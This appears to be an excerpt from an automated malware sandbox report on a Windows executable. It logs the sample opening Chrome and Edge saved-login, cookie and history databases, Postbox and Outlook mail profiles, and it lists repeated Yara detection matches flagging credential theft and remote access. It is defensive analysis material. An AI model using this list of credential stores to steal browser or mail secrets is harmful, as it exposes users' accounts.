Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR
Source: Yara match File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR